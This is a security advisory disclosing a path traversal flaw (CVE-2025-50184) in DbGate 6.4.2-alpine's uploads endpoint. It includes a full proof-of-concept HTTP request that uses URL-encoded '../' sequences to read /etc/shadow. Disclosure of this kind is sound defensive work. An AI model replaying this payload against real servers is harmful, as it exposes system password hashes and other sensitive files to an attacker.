Skip to content

File Traversal via file parameter

High
janproch published GHSA-2fp9-29gv-p5gm Jul 25, 2025

Package

No package listed

Affected versions

6.4.2-alpine

Patched versions

None

Description

DbGate version 6.4.2-alpine is vulnerable to a directory traversal flaw.
The file parameter is not properly restricted to the intended uploads directory. As a result, the endpoint that lists files within the upload directory can be manipulated to access arbitrary files on the system. By supplying a crafted path to the file parameter, an attacker can read files outside the upload directory, potentially exposing sensitive system-level data.

GET Request from Burp:

GET /uploads/get?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow HTTP/1.1
Host: <REPLACE ME>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: <REPLACE ME>
Authorization: Bearer <REPLACE ME>
Connection: keep-alive
Cookie: <REPLACE ME>
Priority: u=4

To replay this attack the headers will need to be replaced. Due to the tokens required, the URL cannot be copied into the browser.

Screenshot From 2025-05-31 23-12-22

Screenshot From 2025-05-31 23-11-23

Severity

High

CVE ID

CVE-2025-50184

Weaknesses

Path Traversal: '..filename'

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '..filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. Learn more on MITRE.

Credits